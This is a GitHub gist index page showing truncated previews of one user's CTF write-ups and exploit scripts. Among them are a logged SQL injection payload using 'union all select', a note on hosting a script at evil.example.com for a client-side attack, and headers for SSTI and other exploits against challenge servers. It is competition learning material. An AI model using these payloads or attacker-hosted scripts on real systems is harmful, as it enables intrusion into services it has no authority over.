Skip to content

Instantly share code, notes, and snippets.

View arkark's full-sized avatar
🔏
🚩

Takeshi Kaneko arkark

🔏
🚩
119 followers · 58 following
View GitHub Profile
@arkark
arkark / darkctf.md
Last active September 27, 2020 16:49
DarkCTF writeup

DarkCTF writeups

https://ctftime.org/event/1118

Web/Apache Logs (431 solves / 113 points)

The following is suspicious because the payload is long and it contains union+all+select.

192.168.32.1 - - [29/Sep/2015:03:39:46 -0400] "GET /mutillidae/index.php?page=client-side-control-challenge.php HTTP/1.1" 200 9197 "http://192.168.32.134/mutillidae/index.php?page=user-info.php&username=%27+union+all+select+1%2CString.fromCharCode%28102%2C%2B108%2C%2B97%2C%2B103%2C%2B32%2C%2B105%2C%2B115%2C%2B32%2C%2B68%2C%2B97%2C%2B114%2C%2B107%2C%2B67%2C%2B84%2C%2B70%2C%2B123%2C%2B53%2C%2B113%2C%2B108%2C%2B95%2C%2B49%2C%2B110%2C%2B106%2C%2B51%2C%2B99%2C%2B116%2C%2B49%2C%2B48%2C%2B110%2C%2B125%29%2C3+--%2B&password=&user-info-php-submit-button=View+Account+Details" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36"
@arkark
arkark / omh-ctf-2021.md
Last active May 16, 2021 12:06
OMH CTF 2021 writeups

OMH CTF 2021 writeups

Polite Notepad

I hosted the following file on my server at http://evil.example.com/static/badwords.js:

var bad1 = 'fuck'
var good1 = 'f**k'
@arkark
arkark / alles-ctf-2021.md
Last active September 5, 2021 04:51
ALLES! CTF 2021

ALLES! CTF 2021

[web] J(ust)-S(erving)-P(ages)

$ echo '{"debugMode": true}' | http --session=./session.json POST "https://7b000000f4b98db0221891c1-just-serving-pages.challenge.master.allesctf.net:31337/config"
HTTP/1.1 200
Content-Length: 2900
Content-Type: text/html;charset=utf-8
Date: Sat, 04 Sep 2021 11:26:02 GMT
@arkark
arkark / exploit.sage
Created June 5, 2022 06:50
SECCON Beginners CTF 2022 - crypto/omni-RSA
# SECCON Beginners CTF 2022
# crypto/omni-RSA
from Crypto.Util.number import isPrime, long_to_bytes
import gmpy2
rq = 7062868051777431792068714233088346458853439302461253671126410604645566438638
e = 2003
n = 140735937315721299582012271948983606040515856203095488910447576031270423278798287969947290908107499639255710908946669335985101959587493331281108201956459032271521083896344745259700651329459617119839995200673938478129274453144336015573208490094867570399501781784015670585043084941769317893797657324242253119873
s = 1227151974351032983332456714998776453509045403806082930374928568863822330849014696701894272422348965090027592677317646472514367175350102138331
@arkark
arkark / exploit.py
Last active June 14, 2022 06:24
WeCTF 2022 / Request Bin (Extra Hard)
# WeCTF 2022 ( https://github.com/wectf/2022 )
# Request Bin (Extra Hard)
# 4 solves / 2526 pts
# SSTI for Go's text/template with Iris web framework
# - Iris: https://github.com/kataras/iris
# - text/template: https://pkg.go.dev/text/template
# The goal is getting the random file name (`/$(uuidgen)-$(uuidgen)`) and printing the flag.
@arkark
arkark / README.md
Created July 4, 2022 12:23
Google Capture The Flag 2022 / HORKOS & LOG4J2
@arkark
arkark / README.md
Created July 25, 2022 12:55
DiceCTF @ HOPE / your-space (web) / bonk (misc)
@arkark
arkark / exploit.fish
Last active September 4, 2022 05:29
CakeCTF 2022 / Panda Memo
# CakeCTF 2022 ( https://ctftime.org/event/1683 )
# web / Panda Memo
set BASE_URL "http://localhost:3000"
set BASIC_USER guest
set BASIC_PASS guest
# set BASE_URL "http://web2.2022.cakectf.com:40767"
# set BASIC_USER guest
# set BASIC_PASS L4VBqmWQZP6S2P8.
@arkark
arkark / solve.py
Created October 2, 2022 16:45
SekaiCTF 2022 / PPC / Electric Box
RN = input()
rs = input()[:20]
LWM = input()
H, W, M = list(map(int, LWM.split(" ")))
obs = ""
for i in range(M):
obs += input() + "_"
obs = obs[:20]
@arkark
arkark / hook.js
Created March 12, 2023 16:37
hxp CTF 2022 - rev/required
/*
hxp CTF 2022 - rev/required
* https://ctftime.org/event/1845
My solution with JavaScript's Proxy:
1. Save this file as `hook.js`
2. Change the first line of `required.js` to: